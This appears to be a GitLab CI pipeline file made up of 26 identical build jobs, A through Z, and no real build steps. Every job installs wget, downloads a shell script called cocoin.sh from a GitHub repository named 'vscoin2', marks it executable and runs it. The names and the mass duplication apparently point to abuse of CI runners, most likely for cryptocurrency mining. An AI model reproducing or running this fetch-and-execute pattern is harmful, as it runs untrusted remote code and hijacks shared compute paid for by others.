stages:
  - build
  - test
  - deploy
 
build:A:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:B:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:C:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:D:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:E:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:F:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:G:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:H:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:I:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:J:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:K:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:L:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:M:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:N:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:O:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:P:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:Q:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:R:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:S:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:T:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:U:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:V:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:W:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:X:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:Y:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:Z:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh